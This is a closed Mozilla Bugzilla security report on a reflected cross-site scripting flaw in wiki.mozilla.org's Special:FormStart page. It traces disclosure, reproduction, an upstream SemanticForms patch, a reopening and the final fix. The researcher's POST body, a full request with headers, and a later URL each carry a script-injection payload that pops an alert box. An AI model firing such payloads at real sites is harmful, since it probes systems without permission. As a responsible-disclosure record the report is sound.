Closed Bug 801638 Opened 8 years ago Closed 6 years ago

XSS: wiki.mozilla.org FormStart

Categories

(Websites :: wiki.mozilla.org, defect)

defect
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: curtisk, Unassigned)

References

()

Details

(Keywords: wsec-xss, Whiteboard: [site:wiki.mozilla.org] [dev=2015-02-05] [stage=2015-02-05] [prod=2015-02-05])

Hello,
My name is Siddhesh Gawde, I am a security researcher ,I have found one vulnerability on an sub-domain of mozilla
Details:

Type of issue: XSS
Browser: Mozilla Firefox v14.0.1
Operating System: Windows 7
Date of finding: 12/10/2012
Website Link: https://wiki.mozilla.org

Links:
The xss vuln is of post type here ,we need to post data here:
https://wiki.mozilla.org/Special:FormStart

Post data is :
page_name=xsss&namespace=&super_page=&params=1087794</script><script>alert(0)</script><"&form=11

This will get the alert box to pop up instantly !

I have attached image of the vulnerability (As proof) of the link which I have mentioned above.
If you need any other information about it then please let me know.
Eagerly waiting for your reply.

Thank you,
Siddhesh Gawde.
Might this be a duplicate of the root issue that is behind bug 761114?
Whiteboard: [site:wiki.mozilla.org]
Flags: sec-bounty-
I can't seem to reproduce this, but I might not be doing it right.

Is this still reproducible?
Flags: needinfo?(curtisk)
Flags: needinfo?(coolsiddheshgawade)
I can't seem to repro either, this may have been addressed by the most recent wiki updates.
Flags: needinfo?(curtisk)
Not able to reproduce this one , the layout is changed completely.
Flags: needinfo?(coolsiddheshgawade)
Sorry i made a mistake while checking it acually.
I am still able to reproduce it.
poc: http://gyazo.com/adc71a0b73d750d96bf7e4ca4573b2ad

Request :

LINK:
https://wiki.mozilla.org/Special:FormStart

HEADERS:
Host: wiki.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wiki.mozilla.org/Special:FormStart
Cookie: __utma=132703880.484202267.1413400289.1413400289.1413468159.2; __utmz=132703880.1413468159.2.2.utmcsr=bugzilla.mozilla.org|utmccn=(referral)|utmcmd=referral|utmcct=/show_bug.cgi; optimizelySegments=%7B%222000810488%22%3A%22false%22%2C%222017550344%22%3A%22ff%22%2C%221994990450%22%3A%22none%22%2C%222011280991%22%3A%22direct%22%7D; optimizelyEndUserId=oeu1413467954737r0.04618477120119591; optimizelyBuckets=%7B%7D; __utmb=132703880.1.10.1413468159; __utmc=132703880; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50


POST DATA:
page_name=x&form=11&namespace=&super_page=&params='"></script><script>alert(0)</script><"


I am using mozilla v29
Ah, I can indeed reproduce that way. Thanks, Siddhesh.
I just confirmed this, this is the first time I had seen it.

https://bugzilla.wikimedia.org/show_bug.cgi?id=72436 (I can add anyone from Mozilla who wants access, just need to know your user on our instance).

We'll get a patch out asap to fix the problem, and coordinate getting an official patch from the maintainers of that extension into the main repo, probably by next week.
(In reply to csteipp from comment #10)
> I just confirmed this, this is the first time I had seen it.
> 
> https://bugzilla.wikimedia.org/show_bug.cgi?id=72436 (I can add anyone from
> Mozilla who wants access, just need to know your user on our instance).

I'm the same on there as here; please add me.

> We'll get a patch out asap to fix the problem, and coordinate getting an
> official patch from the maintainers of that extension into the main repo,
> probably by next week.

We push to our environments every Thursday, FWIW.
Gordon, I just added you to our bug.

The extension maintainer made a public patch for it (https://gerrit.wikimedia.org/r/#/c/168618/). 

I don't have an SMW dev instance, but that should solve the issue.
Whiteboard: [site:wiki.mozilla.org] → [site:wiki.mozilla.org] [dev=2014-10-30]
Depends on: 1081712
With the upgrade of the semantic extensions (bug 1081712), this should be fixed.
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
This is still broken:

https://wiki.mozilla.org/Special:FormStart?page_name=x&form=11&namespace=&super_page=&params='"></script><script>alert('this is still broken')</script><"
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Depends on: 1128117
OK, SemanticForms has been upgraded to 3.1, and it looks like this is now fixed for real.
Group: websites-security
Status: REOPENED → RESOLVED
Closed: 6 years ago6 years ago
Resolution: --- → FIXED
Whiteboard: [site:wiki.mozilla.org] [dev=2014-10-30] → [site:wiki.mozilla.org] [dev=2015-02-05] [stage=2015-02-05] [prod=2015-02-05]
You need to log in before you can comment on or make changes to this bug.